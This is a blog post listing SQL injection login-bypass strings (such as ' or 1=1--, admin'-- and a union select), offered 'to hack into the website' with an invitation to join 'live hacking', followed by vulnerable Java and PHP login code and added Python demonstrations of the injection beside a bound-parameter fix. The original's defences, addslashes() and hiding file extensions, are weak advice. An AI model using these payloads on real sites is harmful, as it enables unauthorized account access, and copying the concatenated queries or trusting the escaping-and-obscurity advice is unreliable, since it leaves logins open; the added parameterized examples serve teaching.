Here I am posting some of the SQL injection strings that you can use to hack into the website.
I have done some practical work out of this, if someone wants to go live hacking using these SQL injection strings, contact to me.
' or 0=0 --
' or 0=0 --'
' or 0=0 #
" or 0=0 --
" or 0=0 --'
'" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
" or 1=1--
or 1=1--
' or a=a--'
' or a=a #
' or a=a--
' or "a"="a
' or 'a'='a
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
' or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
admin'--
' or 1=1--
'" or 1=1--
' union select 1, 'Eyeless', 'ez2do', 1--
admin'--
administrator'--
superuser'--
test'--
This is a short list, but these SQL injection strings are very powerful.
I have another hint:
Not every SQL-based system accepts every one of these strings. For example:
" or "a"="a
') or ('a'='a
On some databases one of these would work and the other wouldn't. The first one targets a query that encloses the username (or password) in double quotes: it first CLOSES the quotes (making it ""), and then adds or "a"="a; the final quote of the query closes the last a, and "a"="a" is always true, so that is how it works.
The second one, however, targets a query written as ('Username'), and turns it into ('') or ('a'='a').
Enjoy the HACK DAY
SQL Injection like this
Login Java Code

    import java.sql.Connection;
    import java.sql.DriverManager;
    import java.sql.PreparedStatement;
    import java.sql.ResultSet;

    // Vulnerable login (as on the page): the SQL text is built by string
    // concatenation, so prepareStatement() receives a query that already
    // contains the raw request parameters.
    String userid = request.getParameter("userid");
    String password = request.getParameter("password");
    Class.forName("sun.jdbc.odbc.JdbcOdbcDriver");
    Connection connection = DriverManager.getConnection("jdbc:odbc:projectDB");
    String query = "SELECT * FROM Users WHERE user_id ='" + userid + "' AND password ='" + password + "'";
    PreparedStatement ps = connection.prepareStatement(query);
    ResultSet users = ps.executeQuery();
    if (users.next()) {
        // login succeeded: something here
    } else {
        // login failed
    }

Injection Works like this
query = "SELECT * FROM Users WHERE user_id ='' OR 1=1; /* AND password ='*/--'";
Login PHP Code
Username = ' OR 1=1;//
Password = ....

    <?php
    // Vulnerable login (as on the page): the POST values are interpolated
    // straight into the SQL string. mysql_query()/mysql_num_rows() belong to
    // the legacy mysql extension, which was removed in PHP 7.
    $myusername = $_POST['usr'];
    $mypassword = $_POST['pwd'];
    $sql = "SELECT * FROM users WHERE user='$myusername' and password='$mypassword'";
    $result = mysql_query($sql);
    $count = mysql_num_rows($result);
    if ($count == 1) {
        // login succeeded: some code
    } else {
        // login failed
    }

Injection Works like this
$sql="SELECT * FROM users WHERE user=''OR 1 = 1;//' and password='....'";
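The following is an added example, not code from the original post: it reproduces the login logic of the Java and PHP snippets above in Python against an in-memory SQLite table (SAMPLE_USERS is constructed data), so the quote-closing explained in the hint section can be watched at query level, and it puts the bound-parameter form beside it. Note that the page's Java code calls prepareStatement() on a string that has already been concatenated, so nothing is gained from the prepared statement; protection comes from passing the input through a ? placeholder, which is what login_parameterized() does.

```python
import sqlite3

# Constructed sample data standing in for the page's "users" table.
SAMPLE_USERS = [("admin", "s3cret"), ("bob", "hunter2")]


def make_db():
    """Build an in-memory SQLite database holding the sample users."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    return conn


def build_query(user, password):
    """The page's string concatenation, exactly as its Java/PHP code does it."""
    return ("SELECT * FROM users WHERE user='" + user
            + "' and password='" + password + "'")


def login_vulnerable(conn, user, password):
    """Mirror of the page's login: any non-empty result counts as success.

    Returns the matched user names so the caller can see which rows the
    (possibly injected) query actually selected.
    """
    rows = conn.execute(build_query(user, password)).fetchall()
    return [row[0] for row in rows]


def login_parameterized(conn, user, password):
    """Same lookup with bound parameters: the input is data, never SQL text."""
    rows = conn.execute(
        "SELECT * FROM users WHERE user=? and password=?",
        (user, password),
    ).fetchall()
    return [row[0] for row in rows]


if __name__ == "__main__":
    conn = make_db()
    # A legitimate login behaves the same in both versions.
    print(login_vulnerable(conn, "bob", "hunter2"))       # ['bob']
    print(login_parameterized(conn, "bob", "hunter2"))    # ['bob']
    # The page's ' or 'a'='a string in the password field: the quote closes
    # the literal, and because AND binds tighter than OR the condition becomes
    # (user='nobody' AND password='') OR 'a'='a', true for every row.
    payload = "' or 'a'='a"
    print(build_query("nobody", payload))
    print(login_vulnerable(conn, "nobody", payload))      # ['admin', 'bob']
    print(login_parameterized(conn, "nobody", payload))   # []
    # The page's admin'-- string in the username field: the -- comment
    # discards the password comparison entirely.
    print(login_vulnerable(conn, "admin'--", "x"))        # ['admin']
    print(login_parameterized(conn, "admin'--", "x"))     # []
```

Both versions return the same answer for a normal login; only the concatenated version lets the content of a field change the shape of the WHERE clause. Returning the matched names rather than a boolean makes the difference between "one row matched" and "every row matched" visible, which is the detail a reviewer wants when auditing a login query.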
How to avoid these mistakes: use the addslashes() function, which puts a backslash (\) before each quote character in the string, in Java and PHP.

    // Java code (the page's pseudo-call: Java has no built-in addSlashes(),
    // an equivalent escaping helper is meant)
    addSlashes(String userid);
    // PHP code
    $myusername = addslashes($_POST['usr']);

Hackers are more intelligent than programmers, so always hide the file extension (eg: *.jsp, *.php, *.asp).
http://xyz.com/login.php to http://xyz.com/login
http://xyz.com/login to http://xyz.com/signin.do
In Java, map these URLs using the web.xml file; in PHP, write a .htaccess file in the root directory.
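An added example (not the post's own code) for the addslashes() advice above, again in Python against SQLite with constructed sample users. addslashes() here is a re-implementation of PHP's function with the same rules; quote_sqlite() is the escaping rule SQLite itself uses. The caveat it demonstrates: backslash escaping is a MySQL convention, and on a database that does not treat backslash as an escape character the "protected" query does not even parse, for a legitimate password containing an apostrophe as much as for the page's strings. Bound parameters, as in the previous example, do not depend on the dialect at all.

```python
import sqlite3

# Constructed sample data; "carol" has a legitimate apostrophe in her password.
SAMPLE_USERS = [("admin", "s3cret"), ("bob", "hunter2"), ("carol", "it's me")]


def make_db():
    """Build an in-memory SQLite database holding the sample users."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    return conn


def addslashes(value):
    """PHP's addslashes(): a backslash before ', ", \\ and NUL (MySQL-style)."""
    out = []
    for ch in value:
        if ch in ("'", '"', "\\"):
            out.append("\\" + ch)
        elif ch == "\x00":
            out.append("\\0")
        else:
            out.append(ch)
    return "".join(out)


def quote_sqlite(value):
    """SQLite's (and standard SQL's) rule: a quote inside a literal is doubled."""
    return value.replace("'", "''")


def build_query(user, password):
    """The page's concatenation, applied to already-escaped values."""
    return ("SELECT * FROM users WHERE user='" + user
            + "' and password='" + password + "'")


def login_escaped(conn, user, password, escape):
    """Page-style login with the given escape function applied to both inputs.

    Returns the matched user names, or None when the escaped text is not a
    valid literal for this database and the query fails to parse.
    """
    sql = build_query(escape(user), escape(password))
    try:
        rows = conn.execute(sql).fetchall()
    except sqlite3.OperationalError:
        return None
    return [row[0] for row in rows]


if __name__ == "__main__":
    conn = make_db()
    payload = "' or 'a'='a"
    print(addslashes(payload))      # \' or \'a\'=\'a
    print(quote_sqlite(payload))    # '' or ''a''=''a
    # Escaping that matches the dialect: the string is compared as data.
    print(login_escaped(conn, "nobody", payload, quote_sqlite))   # []
    print(login_escaped(conn, "carol", "it's me", quote_sqlite))  # ['carol']
    # MySQL-style backslashes on SQLite: the literal is not parseable, so
    # even the legitimate login fails.
    print(login_escaped(conn, "nobody", payload, addslashes))     # None
    print(login_escaped(conn, "carol", "it's me", addslashes))    # None
```

The point is not that one escape function is "the right one": each is right only for one database's literal syntax, and the check has to be repeated for every place a string is spliced into SQL. A bound parameter removes both problems, which is why it is the fix to reach for before any escaping helper.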
By Kaila Piyush
My Google Profile HackingArticles4all.blogspot.com